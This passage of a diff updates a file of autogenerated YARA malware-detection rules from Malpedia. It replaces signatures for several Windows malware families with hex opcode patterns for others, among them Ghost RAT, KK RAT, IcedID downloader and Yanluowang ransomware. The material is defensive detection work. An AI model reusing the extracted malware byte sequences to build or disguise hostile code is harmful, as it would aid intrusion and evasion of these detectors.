-		$sequence_9 = { 48c744243000000000 8b8424c0000000 89442428 488b842430010000 4889442420 448b8c24f0000000 }
+		$sequence_0 = { 8bcf 0facd110 c1fa10 0fb65330 }
+		$sequence_1 = { 5e 8be5 5d c20800 c7460c00000001 }
+		$sequence_2 = { 8b5358 898d88fbffff 8b4b50 0f94c0 }
+		$sequence_3 = { 8d5594 52 6a04 8d4590 50 56 }
+		$sequence_4 = { 8bd7 8b7b40 0facc218 c1f818 8a4340 }
+		$sequence_5 = { 8b4dcc 894308 8b45d0 50 }
+		$sequence_6 = { 5b 5d c20c00 83f803 7574 }
+		$sequence_7 = { 898da8fbffff 8d45e8 8985b4fcffff 8b433c 8bd0 8d4ddc }
+		$sequence_8 = { 6a00 6a00 ff15???????? 85c0 7516 }
+		$sequence_9 = { bb01000000 d3e3 33c0 85db 7e1e 8d4900 }
 
 	condition:
-		7 of them and filesize < 254976
+		7 of them and filesize < 524288
 }
-rule MALPEDIA_Win_Webmonitor_Auto : FILE
+rule MALPEDIA_Win_Thanatos_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4edd58bc-84aa-57fd-8483-88f5d1911dcf"
+		id = "503a7f37-fd56-5eb4-8fd1-5ecbf912c720"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webmonitor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webmonitor_auto.yar#L1-L165"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thanatos_auto.yar#L1-L129"
 		license_url = "N/A"
-		logic_hash = "f03f08c033bc99c38a9a7047c1ab4dd8b784015d4b2f1d48ed5a63b916e4918d"
+		logic_hash = "a490fddf2b1c7ed46086686ac0e8278c90a6f240d56058a2bebac261ed9edf67"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110000,38 +110131,32 @@ rule MALPEDIA_Win_Webmonitor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 33c9 c1eb0a 41 0fb7c3 }
-		$sequence_1 = { 04f0 fd ff01 04f0 fd }
-		$sequence_2 = { 50 51 e8???????? 83c418 807c242000 }
-		$sequence_3 = { 0fb6c0 6a09 33f0 e8???????? }
-		$sequence_4 = { 2b49fc e9???????? 55 8bec f30f104508 ff750c }
-		$sequence_5 = { 0f4345d8 0fbe0408 03d8 e9???????? 03da 8a043b }
-		$sequence_6 = { 0080cd41009c d34100 e8???????? a3???????? 41 }
-		$sequence_7 = { 1b4300 38644400 44 8a4100 }
-		$sequence_8 = { 2503fd006c ff1e e00e 000e }
-		$sequence_9 = { 03c6 53 c1e008 6a0e 8945e0 e8???????? }
-		$sequence_10 = { 04c8 fe04fc fd 04f8 fd ff01 }
-		$sequence_11 = { 41 00baa4f34100 b9???????? ffe1 ba???????? b9???????? ffe1 }
-		$sequence_12 = { 04f8 fd 0512002413 000d???????? 04f4 }
-		$sequence_13 = { 33cd e8???????? c9 c3 68???????? e8???????? }
-		$sequence_14 = { 33c9 6800900100 668908 8bcf }
-		$sequence_15 = { 61 0043ec fe04ec fe05???????? 000d???????? 04c8 }
+		$sequence_0 = { 740a 8b45f8 83e007 3c05 751c 834714fc }
+		$sequence_1 = { ff15???????? 03c0 50 53 ffb514fdffff 56 ff15???????? }
+		$sequence_2 = { 8b856cffffff 8906 8b8570ffffff 8907 8b4dfc 5f 33cd }
+		$sequence_3 = { 56 8d43fe 8bd1 33f6 57 8b7d08 }
+		$sequence_4 = { 8d0449 8d0445981c0210 5d c3 8d04cd00000000 2bc1 8d0445c0390210 }
+		$sequence_5 = { 2db8000000 81e6ff1f0000 03f0 0fb7047528f10110 6685c0 74c5 }
+		$sequence_6 = { 6a00 c705????????00000000 c705????????00000000 ff15???????? 85c0 743e 8d85f0fdffff }
+		$sequence_7 = { 66a1???????? 668945f8 a0???????? 83c420 8845fa 8d45f4 50 }
+		$sequence_8 = { 0f8718010000 8b35???????? 68???????? 53 ffd6 85c0 }
+		$sequence_9 = { 83e003 c1e004 5f 0fb68028850110 884101 5e }
 
 	condition:
-		7 of them and filesize < 1984512
+		7 of them and filesize < 1810432
 }
-rule MALPEDIA_Win_Vsingle_Auto : FILE
+rule MALPEDIA_Win_Icedid_Downloader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "d7b6b6db-e313-5b0b-a645-6bf26597d2b3"
+		id = "d7ee6583-0e42-548a-a503-976de56f1492"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.vsingle"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.vsingle_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.icedid_downloader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.icedid_downloader_auto.yar#L1-L123"
 		license_url = "N/A"
-		logic_hash = "f69fc53fa8d26d98505b2a81c4ca94e19258f9d652d84433b0b518828946acca"
+		logic_hash = "3ad62116cc53f8a172c118313873b176a6f13aff503ffabc7e8b01bb236f4bad"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110045,77 +110170,32 @@ rule MALPEDIA_Win_Vsingle_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 668985ccb6ffff 6800200000 6a00 8d8dceb6ffff 51 e8???????? }
-		$sequence_1 = { 50 6800010000 8b4508 50 }
-		$sequence_2 = { 50 51 b8b0490000 e8???????? }
-		$sequence_3 = { 83c404 50 8d4dd0 51 e8???????? 83c40c }
-		$sequence_4 = { 035508 b801000000 d1e0 8a4dff 880c02 ba04000000 }
-		$sequence_5 = { 035508 be01000000 d1e6 8a0408 }
-		$sequence_6 = { 50 0fb78d10efffff 51 0fb79516efffff 52 0fb78512efffff 50 }
-		$sequence_7 = { 668985d4f6ffff 68fe070000 6a00 8d8dd6f6ffff }
-		$sequence_8 = { 81c29733eaa8 81f2e97da1b5 81ea52e5b08e 81c2f77c29e2 81ea4b516cc2 89042a 5a }
-		$sequence_9 = { 5f 51 57 51 b9cd968197 }
-		$sequence_10 = { 51 b9b187ff90 81e95e49f864 81c17c65b866 81c10f9cc186 }
-		$sequence_11 = { 81c2b953352c 81c26fe1dd9a 81eaf2033eb3 81f2866440c5 81f237c658eb 81c2a804b1a7 }
-		$sequence_12 = { 5b 53 bb8fbc7c14 81c30cf1050f e9???????? 5e }
-		$sequence_13 = { 7505 e9???????? 50 b8e64d1443 81e8dc1e5dbe eb0a }
-		$sequence_14 = { 89042e 5e 56 be76e3d36a 81ee46419e0d }
-		$sequence_15 = { 81f19d49dcd4 81e9c159bc74 890429 59 }
-
-	condition:
-		7 of them and filesize < 940032
-}
-rule MALPEDIA_Win_Mykings_Spreader_Auto : FILE
-{
-	meta:
-		description = "autogenerated rule brought to you by yara-signator"
-		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "96a12e80-b15f-580e-920d-d6c0d35464b0"
-		date = "2023-12-06"
-		modified = "2023-12-08"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mykings_spreader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mykings_spreader_auto.yar#L1-L132"
-		license_url = "N/A"
-		logic_hash = "1bcd674173fea4b83a2f4219e8f61306a972490f94a89cfaf5e1f466fdec8eff"
-		score = 75
-		quality = 75
-		tags = "FILE"
-		version = "1"
-		tool = "yara-signator v0.6.0"
-		signator_config = "callsandjumps;datarefs;binvalue"
-		malpedia_rule_date = "20231130"
-		malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351"
-		malpedia_version = "20230808"
-		malpedia_license = "CC BY-SA 4.0"
-		malpedia_sharing = "TLP:WHITE"
-
-	strings:
-		$sequence_0 = { 7519 51 55 8bce e8???????? 6a00 6a00 }
-		$sequence_1 = { 8b1e ff938c000000 8b0424 8b5014 85d2 7507 bf00000000 }
-		$sequence_2 = { e8???????? 837e1800 7439 8b4620 c1e003 89c7 8b4618 }
-		$sequence_3 = { 89c1 c745f401000000 3b4df4 723d ff4df4 8d7600 ff45f4 }
-		$sequence_4 = { 68???????? 50 ff15???????? a3???????? 83c0fe 40 40 }
-		$sequence_5 = { 8942fc 89d8 c1f81f 8b1424 8b7208 8b4a0c 29de }
-		$sequence_6 = { eb02 b300 e8???????? 8d45cc e8???????? c745cc00000000 58 }
-		$sequence_7 = { 33d2 b9???????? 8bc2 8bf2 c1f805 83e61f 8b0485a02e4100 }
-		$sequence_8 = { 89d8 29f0 85c0 7e39 8b55f4 85d2 7505 }
-		$sequence_9 = { 8b7508 8b36 8975c8 8b7d08 8b7f04 }
+		$sequence_0 = { 8bf0 8944241c 8d442408 50 6a08 6aff 885c241c }
+		$sequence_1 = { 56 6a02 ff74241c ffd7 ff15???????? 83f87a 0f85e9000000 }
+		$sequence_2 = { 8bf0 e8???????? 85f6 740c 8b4508 3b07 }
+		$sequence_3 = { 83e801 740a 83e801 751c 80cb01 }
+		$sequence_4 = { 56 68000000c0 ff7510 ff15???????? }
+		$sequence_5 = { 8d442428 50 ff742438 ff15???????? 8d442440 50 68???????? }
+		$sequence_6 = { 7821 395df8 741c 6a04 8d45f8 }
+		$sequence_7 = { 8b08 50 ff5114 85c0 7404 33c0 }
+		$sequence_8 = { 8b442418 8d542430 59 59 56 8b08 }
+		$sequence_9 = { 896c241c 896c240c 896c2420 896c2438 895c2434 ff15???????? }
 
 	condition:
-		7 of them and filesize < 1581056
+		7 of them and filesize < 40960
 }
-rule MALPEDIA_Win_Ice_Event_Auto : FILE
+rule MALPEDIA_Win_Arefty_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "efa7e53a-c463-50f7-ba83-6d9ec3219251"
+		id = "00e4c323-1086-5d09-b0dc-b3d3486d1cb0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_event"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ice_event_auto.yar#L1-L118"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.arefty"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.arefty_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "ef09062340f20eb30ff347046cee2303e5aa0ba34beeb1b65aa69fb96594e3f6"
+		logic_hash = "d90c0aff72ecb08f18ac74bec7d59a72670c6515429c6fde34529cd8bd03f3d6"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110129,32 +110209,32 @@ rule MALPEDIA_Win_Ice_Event_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 48c74424780f000000 c644246000 488b4598 4883f810 }
-		$sequence_1 = { 3b0d???????? 7326 4863c9 488d15b4080100 488bc1 83e13f }
-		$sequence_2 = { 48c743180f000000 c60300 8bc6 488b4c2478 4833cc e8???????? 4c8d9c2480000000 }
-		$sequence_3 = { 4863f8 4803f7 4983c9ff 4c8bc7 488d542430 488d4dc8 }
-		$sequence_4 = { 4156 4883ec28 488b4210 498bf9 498bf0 }
-		$sequence_5 = { 660f28d1 660f28c1 4c8d0d8b9f0000 f20f101d???????? f20f100d???????? }
-		$sequence_6 = { 488bcb 4a8d1441 482bf5 4c8d3436 }
-		$sequence_7 = { 4833cc e8???????? 488b9c24a0110000 4881c470110000 5f }
-		$sequence_8 = { 8bce 894d30 8bc6 894538 ffc3 83fb3c 0f8c6cffffff }
-		$sequence_9 = { 488bce e8???????? eb55 4c896d68 48c745700f000000 }
+		$sequence_0 = { 57 e8???????? 83c404 83fbff 7407 53 }
+		$sequence_1 = { 50 53 ff15???????? 680000a000 e8???????? 8bf8 }
+		$sequence_2 = { 50 8b07 68???????? 6a03 8d04b0 50 e8???????? }
+		$sequence_3 = { 8b07 68???????? 6a03 8d04b0 }
+		$sequence_4 = { ff15???????? 680000a000 e8???????? 8bf8 }
+		$sequence_5 = { ff15???????? 85ff 7409 57 e8???????? 83c404 83fbff }
+		$sequence_6 = { 8b07 68???????? 6a03 8d04b0 50 e8???????? 46 }
+		$sequence_7 = { 0fb6041e 50 8b07 68???????? 6a03 8d04b0 50 }
+		$sequence_8 = { 50 53 ff15???????? 680000a000 e8???????? }
+		$sequence_9 = { 0fb6041e 50 8b07 68???????? 6a03 }
 
 	condition:
-		7 of them and filesize < 331776
+		7 of them and filesize < 237568
 }
-rule MALPEDIA_Win_Regretlocker_Auto : FILE
+rule MALPEDIA_Win_Kk_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "50b9971a-330e-56d2-b756-71f28fc91f9f"
+		id = "d3a867fb-765c-587c-976d-8b832133ea92"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.regretlocker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.regretlocker_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.kk_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.kk_rat_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "ead6b2d4c6df817cb3c1a72366d53d238049299ae52f7c46e3aa685242a44978"
+		logic_hash = "f46ada63a222e5519816a10f8a2e3c2cfb8e81915e639c45c54d3595ef668e74"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110168,32 +110248,32 @@ rule MALPEDIA_Win_Regretlocker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8d4d8f e8???????? 8bf8 6a20 58 ff35???????? }
-		$sequence_1 = { 7202 8b09 6a00 51 e8???????? 83f8ff }
-		$sequence_2 = { 8d8560feffff 8bce 50 e8???????? 84c0 746b }
-		$sequence_3 = { e9???????? 8b4df0 83c12c e9???????? 8d4dd8 e9???????? b8???????? }
-		$sequence_4 = { eb4c 8b08 80790d00 7439 8b4804 80790d00 }
-		$sequence_5 = { 8b01 8945ec 3bc1 0f84c5000000 8855e8 33ff 8855e4 }
-		$sequence_6 = { a5 a5 8d7dec ab ab }
-		$sequence_7 = { 56 57 8b7d08 8bf1 3bf7 742b 8d4718 }
-		$sequence_8 = { 8bc1 2b45cc 99 f7fb c645fc02 8bf0 8b45c4 }
-		$sequence_9 = { 5b 85c0 0f8569ffffff 8b4df4 8bc6 5f 5e }
+		$sequence_0 = { 8a4510 53 56 8bf1 57 8b7d08 8886d4000000 }
+		$sequence_1 = { 8d85f4fdffff 68???????? 50 e8???????? 8d85f8feffff 50 8d85f4fdffff }
+		$sequence_2 = { bb01000000 8b461c 83782c00 7421 8b4614 3bc2 761a }
+		$sequence_3 = { 7524 a1???????? a3???????? a1???????? c705????????24961010 8935???????? }
+		$sequence_4 = { 51 8b4508 b94d5a0000 66c7004d5a 663908 7404 33c0 }
+		$sequence_5 = { ff15???????? 53 50 8985ecfdffff 899de8fdffff ff15???????? }
+		$sequence_6 = { 741c 8d45cc 50 c745cc0b000000 c745f03ce51210 e8???????? 85c0 }
+		$sequence_7 = { 885dda c78504ffffff5245475f c78508ffffff45585041 c7850cffffff4e445f53 66c78510ffffff5a00 c78574ffffff5245475f c78578ffffff44574f52 }
+		$sequence_8 = { 897dfc 8b3d???????? ffd7 6a01 ff35???????? 8d8dbc60ffff ff35???????? }
+		$sequence_9 = { 8bf1 837e1410 57 7202 8b0e 8b450c }
 
 	condition:
-		7 of them and filesize < 1021952
+		7 of them and filesize < 3516416
 }
-rule MALPEDIA_Win_Redyms_Auto : FILE
+rule MALPEDIA_Win_Cueisfry_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ef628f44-574a-5627-8d8b-734217cd0062"
+		id = "0fc68627-9787-5873-a3fa-a9f7712605ab"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.redyms"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.redyms_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cueisfry_auto.yar#L1-L117"
 		license_url = "N/A"
-		logic_hash = "332ef19bb997044700a2b380446c47adf654ddb5c63453028d068b88131edb5b"
+		logic_hash = "c43c2b52de01a945341ae2efff0ffdd3edf0dcb4158573a62c18b687e85e4c2e"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110206,33 +110286,33 @@ rule MALPEDIA_Win_Redyms_Auto : FILE
 		malpedia_license = "CC BY-SA 4.0"
 		malpedia_sharing = "TLP:WHITE"
 
-	strings:
-		$sequence_0 = { c745d800000000 8b7dd8 56 6a00 ff15???????? }
-		$sequence_1 = { 53 03f7 56 57 e8???????? 83c40c }
-		$sequence_2 = { 2bf7 03c7 83ee02 56 8d540802 52 53 }
-		$sequence_3 = { b8???????? ffd0 898590feffff 85c0 }
-		$sequence_4 = { 8b856cfdffff 50 ff15???????? 6a09 8d8d74feffff 51 68???????? }
-		$sequence_5 = { 8b0f 014b2c 8b4b2c 85c0 7571 }
-		$sequence_6 = { 85ff 7433 8b95ecfeffff 83c2fc }
-		$sequence_7 = { 740b 50 53 ff15???????? 50 ffd6 8b45d4 }
-		$sequence_8 = { 6a00 68???????? 68???????? 51 56 }
-		$sequence_9 = { 8bf0 85f6 740c 8b550c 57 52 56 }
-
+	strings:
+		$sequence_0 = { 68???????? e8???????? 8d8c24b8050000 68???????? 51 }
+		$sequence_1 = { 7517 8d8c24b0010000 68???????? 51 e8???????? }
+		$sequence_2 = { c3 81ec24030000 a1???????? 8b0d???????? }
+		$sequence_3 = { 8dbc2435010000 c684243401000000 68???????? f3ab 66ab 8d8c2438010000 51 }
+		$sequence_4 = { 8bee 33ff 85c9 89542430 896c2410 0f8ebd010000 8d4103 }
+		$sequence_5 = { b940000000 33c0 8dbc2435010000 c684243401000000 }
+		$sequence_6 = { 6aff 68???????? 64a100000000 50 64892500000000 81eca8070000 }
+		$sequence_7 = { 68???????? f3a5 50 e8???????? 8d4c2424 }
+		$sequence_8 = { 68???????? 50 c744242401000000 c744242000010000 }
+		$sequence_9 = { 51 8d442420 8bcc 89642430 50 c68424c401000003 }
+
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 81920
 }
-rule MALPEDIA_Win_Gcman_Auto : FILE
+rule MALPEDIA_Win_Yanluowang_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5cac84ae-f553-54c6-a2ab-9c6f483e5d7f"
+		id = "4468bae4-7d21-5c9c-b3c6-a951c19ed833"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.gcman"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.gcman_auto.yar#L1-L125"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yanluowang"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yanluowang_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "6db65719f209f972eea7f56ad4db94ab537c244677bf2af532fb68763547fbd8"
+		logic_hash = "7c2e1069418a1f62952d42a3190c40f6e9223a885e325767a86810d1579f3abb"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110246,32 +110326,32 @@ rule MALPEDIA_Win_Gcman_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 01d9 89de 31c6 21ce 31c6 0375c4 01f2 }
-		$sequence_1 = { 8d45d4 89442408 c744240413000020 8b45e4 890424 e8???????? }
-		$sequence_2 = { 89ce 31de 21c6 31de 0375a8 }
-		$sequence_3 = { 31c6 0375b4 01f1 81e979f22a0b c1c10e 01d9 }
-		$sequence_4 = { 89442408 8b4510 89442404 8b45e8 890424 e8???????? }
-		$sequence_5 = { 8b4508 40 0fb600 c0e804 240f 0202 8801 }
-		$sequence_6 = { c1e818 8802 8b550c 83c254 8b450c 8b4014 }
-		$sequence_7 = { 40 8945f4 eb0c 8d45e0 }
-		$sequence_8 = { 01c3 89de 31c6 31d6 0375d4 01f1 81c122619d6d }
-		$sequence_9 = { 890424 e8???????? 8b45ec 8945f4 8b45f4 803800 741f }
+		$sequence_0 = { c745dc00010001 c745e000010001 c745e400010001 c745e800010001 e8???????? 83c40c }
+		$sequence_1 = { 56 57 50 8d45f4 64a300000000 8995a4fdffff 898da0fdffff }
+		$sequence_2 = { 33733c 334b30 335338 8bc1 0bce 33f7 23f8 }
+		$sequence_3 = { 8b442438 336c2434 03d5 0fb6e8 c1e808 339cae00040000 33d8 }
+		$sequence_4 = { c744242c00000000 8bc3 b902000000 f7f6 807c241300 8bf0 8b442418 }
+		$sequence_5 = { 7402 890b 3355e8 8d4808 85c9 7402 }
+		$sequence_6 = { 0fbe41ff 8d04c528984400 ebbd 8a11 }
+		$sequence_7 = { ebdf c745e4b4a44400 c745e803000000 ebcf c745e4b8a44400 ebbf c745e4c0a44400 }
+		$sequence_8 = { 0f87f4010000 0fb680bbc94200 ff24859fc94200 8365e400 8d4de4 8365e800 6a7b }
+		$sequence_9 = { ff742418 6a00 6a00 6a04 6a01 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 834560
 }
-rule MALPEDIA_Win_Spyder_Patchwork_Auto : FILE
+rule MALPEDIA_Win_Agendacrypt_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "ff9f13ab-f307-5c96-9d42-3d8adb391da2"
+		id = "4966f69d-c40f-52c7-ab6b-916949adbb8d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.spyder_patchwork"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.spyder_patchwork_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.agendacrypt"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.agendacrypt_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "a4925947525684eeb2c63af57878906d58b4bbbd5876d1885456e41c85c55b5b"
+		logic_hash = "0e351b6d1fd5e325b27b4cca5ef7ee4f990f5eb0183c139b2c6519ec640c4f6c"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -110285,34 +110365,34 @@ rule MALPEDIA_Win_Spyder_Patchwork_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 3930 0f8551010000 8b4004 83f82a 7429 83f839 7424 }
-		$sequence_1 = { ff74246c 50 e8???????? 83c410 5f 5e 5b }
-		$sequence_2 = { 8904a9 8b4c2444 8b44241c c1e002 0101 8b4c2458 8b442430 }
-		$sequence_3 = { e9???????? 6800030000 8d44242c 50 6a07 6801990000 e8???????? }
-		$sequence_4 = { 743c ba80000000 be00080000 0f1f8000000000 0fb60419 0fb70445403b4400 }
-		$sequence_5 = { e8???????? ff7620 e8???????? 56 e8???????? 83c420 5f }
-		$sequence_6 = { 741f 8b542410 3bca 7617 8b4608 2bca 51 }
-		$sequence_7 = { 8b4c242c 8d04b0 8b28 4e ba02000000 894c2414 89442420 }
-		$sequence_8 = { 6689460c 8b0f 8bc1 83e002 83c800 741d 668b4648 }
-		$sequence_9 = { ff15???????? 6a06 6a00 ff15???????? 6a00 6a00 6a00 }
+		$sequence_0 = { e8???????? 85c0 0f8409010000 f30f7e05???????? 0f280d???????? 89442428 c744243404000000 }
+		$sequence_1 = { 8b75d4 89500c 85f6 7516 eb38 8b45e8 8b5804 }
+		$sequence_2 = { 89c3 81fba3030000 8955d8 0f84e9000000 660f1f840000000000 81fb00001100 0f8420ffffff }
+		$sequence_3 = { 8d4c2424 8d542470 e8???????? e9???????? b9???????? eb63 c744247006000000 }
+		$sequence_4 = { 8d4dec e8???????? 8b55f4 8b45ec 66c7045000ff 42 8955f4 }
+		$sequence_5 = { e8???????? 837dcc02 7211 a1???????? ff75d0 6a00 ff30 }
+		$sequence_6 = { e8???????? 8b7de8 8b75f0 8b4510 66c704772200 46 8975f0 }
+		$sequence_7 = { c745d000000000 8945f0 8d45f0 c745f490b04100 8945d8 c745dc01000000 8d45c8 }
+		$sequence_8 = { c1c20e 894dc0 8b4db4 c1c619 31d0 89fa 31f0 }
+		$sequence_9 = { f20f1145b0 894db8 742c f20f1045bc f20f104dc4 f20f114de4 f20f1145dc }
 
 	condition:
-		7 of them and filesize < 2260992
+		7 of them and filesize < 3340288
 }
-rule MALPEDIA_Win_Scieron_Auto : FILE
+rule MALPEDIA_Win_Ghost_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "33fc8152-5e48-52c8-ac9b-34f4ee2aaa91"
+		id = "a5c1e7c4-1b2d-598f-9f4c-addb333c7981"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.scieron"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.scieron_auto.yar#L1-L116"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghost_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghost_rat_auto.yar#L1-L313"
 		license_url = "N/A"
-		logic_hash = "dfba23a630ecd443346ae8a23831b1a493de37d653bee925abed5860ba8acc68"
+		logic_hash = "1382f8506f533271928000e01179914edf911c946385102a130b99bae8ad91d3"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -110324,32 +110404,56 @@ rule MALPEDIA_Win_Scieron_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ffd0 85ff 7411 833d????????00 }
-		$sequence_1 = { 8b442424 33ff 217c241c 0144241c ff442410 6a10 58 }
-		$sequence_2 = { 57 eb6b 8b7c2410 3bfd }
-		$sequence_3 = { ffb614400010 83c718 ffb618400010 8d443c30 50 }
-		$sequence_4 = { c9 c3 55 8bec 51 e8???????? e8???????? }
-		$sequence_5 = { 7542 50 50 0fb78604020000 }
-		$sequence_6 = { ffd7 ffd0 6a04 8d442414 }
-		$sequence_7 = { e9???????? 81ec8c020000 53 8b1d???????? 55 33c0 57 }
-		$sequence_8 = { 8d85d8fdffff 50 ffd6 85c0 7409 }
-		$sequence_9 = { 53 6a40 ffd7 85c0 7414 }
+		$sequence_0 = { 8bd9 e8???????? 8b4d08 3bc8 }
+		$sequence_1 = { 8b400c 85c0 7505 a1???????? 50 8bce e8???????? }
+		$sequence_2 = { 6a01 56 ff15???????? 5e c20800 }
+		$sequence_3 = { 33c0 5b 8be5 5d c20400 894df4 }
+		$sequence_4 = { c745f800000000 df6df4 83ec08 dc0d???????? }
+		$sequence_5 = { c20400 894df4 c745f800000000 df6df4 }
+		$sequence_6 = { 6a6b 8bce e8???????? 5f 5e }
+		$sequence_7 = { 68???????? 50 6802000080 e8???????? 83c41c 5f 5e }
+		$sequence_8 = { 68???????? 68???????? 6a00 6a00 c705????????20010000 e8???????? 8b35???????? }
+		$sequence_9 = { e8???????? 8b8e549f0000 83c41c 89848e14030000 }
+		$sequence_10 = { e8???????? 83c40c ff7508 6a40 ff15???????? }
+		$sequence_11 = { ff7510 ff75dc ff15???????? 85c0 7507 }
+		$sequence_12 = { e9???????? 8d45dc 50 681f000200 }
+		$sequence_13 = { f7d1 49 7509 5f 5e 5b }
+		$sequence_14 = { 83c408 e8???????? c1e00a 6a04 }
+		$sequence_15 = { e8???????? 6a6f 8bce e8???????? 5e }
+		$sequence_16 = { 8dbd85feffff f3ab 66ab aa }
+		$sequence_17 = { 83c12c e9???????? 8b4df0 83c154 e9???????? 8b4df0 83c17c }
+		$sequence_18 = { 8d4e10 e8???????? 6a6b 8bce }
+		$sequence_19 = { 8365fc00 ff7508 ff15???????? 40 50 ff15???????? 59 }
+		$sequence_20 = { e8???????? 84c0 7505 83ceff eb2c }
+		$sequence_21 = { 89849614030000 8b86549f0000 40 8986549f0000 }
